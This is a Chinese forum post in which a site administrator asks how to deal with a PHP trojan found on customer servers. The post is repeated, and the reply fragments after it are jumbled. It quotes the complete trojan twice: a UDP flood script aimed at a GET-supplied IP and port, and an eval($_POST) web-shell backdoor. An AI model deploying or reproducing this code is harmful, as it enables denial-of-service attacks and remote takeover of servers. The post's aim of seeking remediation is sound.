最近经常遇到客户网站被挂php木马,如下:<?
// 访问 ddos.php?ip=192.168.1.1&port=80&time=1 来进行攻击,time值为持续的秒数
?><?php
$packets = 0;
$ip = $_GET['ip'];
$rand = $_GET['port'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET['time'];
$time = time();
print "Flooded: $ip on port $rand <br><br>";
$max_time = $time+$exec_time;for($i=0;$i<65535;$i++)
{
$out .= "X";
}while(1)
{
$packets++;
if(time() > $max_time)
{
break;
}
$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
if($fp)
{
fwrite($fp, $out);
fclose($fp);
}
}echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
?><?php eval($_POST[ddos])?>这样造成服务器对外发包现象,一直找不到根本的解决方法,求高手支招!
// 访问 ddos.php?ip=192.168.1.1&port=80&time=1 来进行攻击,time值为持续的秒数
?><?php
$packets = 0;
$ip = $_GET['ip'];
$rand = $_GET['port'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET['time'];
$time = time();
print "Flooded: $ip on port $rand <br><br>";
$max_time = $time+$exec_time;for($i=0;$i<65535;$i++)
{
$out .= "X";
}while(1)
{
$packets++;
if(time() > $max_time)
{
break;
}
$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
if($fp)
{
fwrite($fp, $out);
fclose($fp);
}
}echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
?><?php eval($_POST[ddos])?>这样造成服务器对外发包现象,一直找不到根本的解决方法,求高手支招!
2. 屏蔽垃圾访问的IP
3. 格式化PHP内部访问变量get, post, 用统一入口,对不同程度的请求分类管理大多数在服务器上装个防干扰模块, 屏蔽掉IP。
2.禁用gzinflate